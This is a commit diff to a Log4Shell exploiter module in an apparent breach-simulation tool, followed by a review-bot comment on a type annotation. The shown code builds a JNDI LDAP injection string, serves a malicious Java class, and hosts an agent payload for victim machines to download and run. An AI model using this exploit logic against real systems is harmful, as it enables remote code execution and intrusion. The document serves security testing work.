Agent: Use random agent name in log4shell exploiter

vakaris_zilius 2022-03-24 10:37:57 +00:00
parent dc2a63475b
commit 90b4038c14
1 changed files with 6 additions and 4 deletions


@ -1,5 +1,6 @@
import logging import logging
import time import time
from pathlib import Path
from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT, MEDIUM_REQUEST_TIMEOUT
from infection_monkey.exploit.log4shell_utils import ( from infection_monkey.exploit.log4shell_utils import (
@ -10,6 +11,7 @@ from infection_monkey.exploit.log4shell_utils import (
build_exploit_bytecode, build_exploit_bytecode,
get_log4shell_service_exploiters, get_log4shell_service_exploiters,
) )
from infection_monkey.exploit.tools.helpers import get_agent_dest_path
from infection_monkey.exploit.tools.http_tools import HTTPTools from infection_monkey.exploit.tools.http_tools import HTTPTools
from infection_monkey.exploit.web_rce import WebRCE from infection_monkey.exploit.web_rce import WebRCE
from infection_monkey.i_puppet.i_puppet import ExploiterResultData from infection_monkey.i_puppet.i_puppet import ExploiterResultData
@ -60,13 +62,13 @@ class Log4ShellExploiter(WebRCE):
self._agent_http_server_thread = None self._agent_http_server_thread = None
def _start_servers(self): def _start_servers(self):
dropper_target_path = self.monkey_target_paths[self.host.os["type"]] target_path = get_agent_dest_path(self.host, self.options)
# Start http server, to serve agent to victims # Start http server, to serve agent to victims
agent_http_path = self._start_agent_http_server(dropper_target_path) agent_http_path = self._start_agent_http_server(target_path)
# Build agent execution command # Build agent execution command
command = self._build_command(dropper_target_path, agent_http_path) command = self._build_command(target_path, agent_http_path)
# Start http server to serve malicious java class to victim # Start http server to serve malicious java class to victim
self._start_class_http_server(command) self._start_class_http_server(command)
@ -111,7 +113,7 @@ class Log4ShellExploiter(WebRCE):
interface_ip = get_interface_to_target(self.host.ip_addr) interface_ip = get_interface_to_target(self.host.ip_addr)
return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}" return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}"
def _build_command(self, path, http_path) -> str: def _build_command(self, path: Path, http_path) -> str:
# Build command to execute # Build command to execute
monkey_cmd = build_monkey_commandline(self.host, self.current_depth - 1, location=path) monkey_cmd = build_monkey_commandline(self.host, self.current_depth - 1, location=path)
if "linux" in self.host.os["type"]: if "linux" in self.host.os["type"]:
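Review bot: The new annotation `path: Path` on `_build_command` names the concrete `pathlib.Path`, which takes the path flavour of the machine running this code, while the value describes a file location on the remote host and the function branches on `self.host.os["type"]` just below. `get_agent_dest_path` is not visible on this page, so this is inferred, but if it returns a pure path in the target's flavour the signature would be more accurate as `def _build_command(self, path: PurePath, http_path: str) -> str:`, with `from pathlib import PurePath` in place of the `Path` import. The same object is now handed to `build_monkey_commandline(..., location=path)` and to `_start_agent_http_server(target_path)`, so it is worth confirming that both accept a path object where they previously received a `str` from `monkey_target_paths`. The rest of `_build_command` lies outside the hunk, so how the path is rendered into the final command string cannot be checked from here.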